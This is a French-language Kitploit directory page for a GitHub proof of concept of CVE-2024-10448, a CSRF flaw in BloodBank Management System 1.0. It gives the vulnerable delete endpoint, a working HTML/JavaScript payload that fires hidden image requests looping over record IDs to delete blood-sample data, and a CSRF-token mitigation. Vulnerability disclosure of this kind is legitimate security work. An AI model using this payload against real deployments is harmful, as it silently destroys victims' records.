Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-10448 — Preuve de concept d'attaque CSRF sur banque du sang | Kitploit
Outils/GitHubGitHub/bevennyamande/cve-2024-10448
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubbevennyamande/cve-2024-10448

CVE-2024-10448

Preuve de concept d'attaque CSRF sur banque du sang

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Version affectée :

  • BloodBank Management System : 1.0

Informations sur la vulnérabilité :

  • Type de vulnérabilité : Cross Site Request Forgery (CSRF)
  • Gravité : ÉLEVÉE
  • Statut : Non corrigé

Point de terminaison vulnérable :

  • Chemin : /file/delete.php?bid=

Description de la vulnérabilité :

Une vulnérabilité Cross Site Request Forgery (CSRF) a été découverte dans la fonctionnalité de demande de sang du BloodBank Management System. Ce défaut se produit lors de l'envoi d'une requête delete vers ce chemin /file/delete.php?bid= permettant au paramètre bid de sélectionner un enregistrement à supprimer dans l'application. Cependant, les bids sont dynamiques selon l'ajout des échantillons de sang, donc pour que la requête réussisse, j'ai utilisé une balise d'image générée par JavaScript dans une boucle.

L'exploitation réussie peut entraîner des actions non autorisées, c'est-à-dire la suppression de données au nom de la victime. De plus, cela pourrait être exploité en visitant des sites Web malveillants contenant la charge utile.


Preuve de concept (PoC) :

Voici un exemple d'attaque CSRF POC qui supprime les échantillons de sang disponibles via le paramètre bid, héberger le fichier sur un domaine contrôlé par l'attaquant ; dans mon cas, j'utilisais localhost :

root@kitploit:~

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC</title>
</head>
<body>
    <h2>CSRF Proof of Concept for Deleting Blood Bank Records</h2>
    <script>
        // Define the target URL where the Blood Bank System is hosted
        const targetUrl = "http://localhost/bloodbank/file/delete.php";

        // Loop through possible bid values (0 to 20) can be increased to as much as possible :)
        for (let bid = 0; bid <= 20; bid++) {
            // Create an image element for each bid value to send the GET request
            let img = document.createElement("img");
            img.src = `${targetUrl}?bid=${bid}`;
            img.style.display = "none";  // Hide the image from view
            document.body.appendChild(img);
        }
    </script>
</body>
</html>


Vidéo PoC

  • lien vidéo

Impact :

  • Manipulation des données : Les attaquants pourraient modifier le contenu affiché aux utilisateurs.
  • Atteinte à la réputation : Les utilisateurs peuvent perdre confiance dans le système en raison d'un comportement malveillant.

Recommandations d'atténuation :

  1. Utiliser un jeton CSRF Mettez en œuvre un mécanisme pour dissuader l'accès inter-domaines ou placez des jetons CSRF dans vos requêtes et évitez également que les requêtes GET n'effectuent des actions modifiant l'état.
Télécharger l’outil